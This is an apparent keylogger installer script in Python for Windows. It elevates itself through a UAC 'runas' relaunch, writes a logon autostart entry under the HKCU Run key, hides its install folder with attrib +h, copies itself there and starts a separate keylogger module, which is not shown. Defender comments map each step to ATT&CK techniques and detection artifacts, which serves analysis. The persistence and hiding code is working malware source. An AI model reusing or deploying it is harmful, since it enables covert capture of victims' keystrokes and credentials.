keylogger_admin.py
import os, sys, subprocess, ctypes
import keylogger
from getpass import getuser
from shutil import copy
# Run command line
def exec_cmd (cmde):
    """Run a command string through the system shell and return its output.

    Returns the child's stdout bytes followed by its stderr bytes. When
    ``cmde`` is empty or None, nothing is run and the function returns
    None implicitly.

    NOTE(review): indentation was lost on this page. The nesting here is
    reconstructed (``return`` sits inside the ``if`` because ``cmdout`` is
    only bound there) -- confirm against the original file.
    """
    if cmde:
        # shell=True hands the whole string to the shell (cmd.exe on Windows),
        # so the command appears as a shell child of this process. That
        # parent/child pair and its command line are what process-creation
        # logging records.
        execproc = subprocess.Popen(cmde, shell=True, stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE)
        # Both streams are read to end-of-file and concatenated; the exit code
        # is never inspected, so callers cannot tell success from failure.
        cmdout = execproc.stdout.read() + execproc.stderr.read()
        return cmdout
# Check if a user has admin rights
def is_admin():
    """Report whether the current process has administrator rights.

    Returns the result of shell32 ``IsUserAnAdmin()`` (nonzero when the
    caller is an administrator), or False if the call cannot be made.
    """
    try:
        return ctypes.windll.shell32.IsUserAnAdmin()
    except:
        # Bare except: any failure (for example ``ctypes.windll`` not existing
        # off Windows) is reported as "not admin" rather than raised.
        return False
# Copy exec file to this folder
def run_by_admin(exec_path):
    """Install the running executable into ``exec_path`` on first run.

    Does nothing when ``exec_path`` already exists. Otherwise, if the process
    is not elevated, it relaunches itself with the "runas" verb and exits.
    When elevated, it registers a logon autostart entry, creates
    ``exec_path``, marks it hidden, and copies ``sys.executable`` into it.

    NOTE(review): indentation was lost on this page. The nesting below is
    reconstructed (install steps placed inside the "folder does not exist"
    branch, since ``os.makedirs`` would raise on an existing folder) --
    confirm against the original file.
    """
    # Defender note: this block is per-user logon persistence (MITRE ATT&CK
    # T1547.001) plus a hidden directory (T1564.001). Artifacts visible here:
    #   - a value named 'IamnotKeylogger' under
    #     HKCU\Software\Microsoft\Windows\CurrentVersion\Run
    #   - a "REG ADD ... CurrentVersion\Run" command line spawned via the shell
    #   - an "attrib +h" command line targeting the install folder
    #   - a copy of the running executable inside exec_path
    # Process-creation logging and registry value-set auditing on the Run key
    # both surface this behavior. Tools that enumerate autostart entries will
    # list the value.
    if not os.path.exists(exec_path):
        if not is_admin():
            # Re-run the program and request admin rights. The "runas" verb
            # raises a UAC consent prompt, which is visible to the user.
            # The trailing 1 is the show-window argument (SW_SHOWNORMAL).
            ctypes.windll.shell32.ShellExecuteW(None, "runas", sys.executable, __file__, None, 1)
            sys.exit()
        # Craft the command line
        filename = os.path.basename(sys.executable)
        reg_name = 'IamnotKeylogger'
        # Value data: the quoted path of the copied executable followed by the
        # "/background" argument.
        reg_path = r'\"%s\%s\" /background' %(exec_path, filename)
        #REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "IamnotKeylogger" /t REG_SZ /d "\"C:\Users\minh\IamnotKeylogger\keylogger.exe\" /background" /F
        cmde = r'REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "%s" /t REG_SZ /d "%s" /F' %(reg_name, reg_path)
        # The command output is discarded, so a failed registry write goes
        # unnoticed and the copy below still runs.
        exec_cmd(cmde)
        # Copy to hidden folder
        os.makedirs(exec_path)
        # Sets the Hidden attribute on the folder. It stays visible to
        # "dir /a" and to Explorer with hidden items shown.
        os.system('attrib +h ' + exec_path)
        copy(sys.executable, exec_path)
# Main handle
def execute():
    """Entry point: install into the user's profile, then start the logger.

    Builds the install path from the current user name, runs the first-run
    install step, and hands the same path to ``keylogger.run``.
    """
    user_name = getuser()
    # Fixed, predictable install location under the user's profile. The folder
    # name matches the Run-key value name, which makes it a usable indicator
    # for triage.
    exec_path = r'C:\Users\%s\IamnotKeylogger' %(user_name)
    run_by_admin(exec_path)
    # keylogger.run lives in a module not shown on this page. Presumably it
    # starts keystroke capture (ATT&CK T1056.001) and uses exec_path for its
    # output -- confirm against that module.
    keylogger.run(exec_path)
# Test
if __name__ == '__main__':
    # Running the file directly performs the full install-and-run path in
    # execute(). execute() takes no arguments, so there is no dry-run mode.
    execute()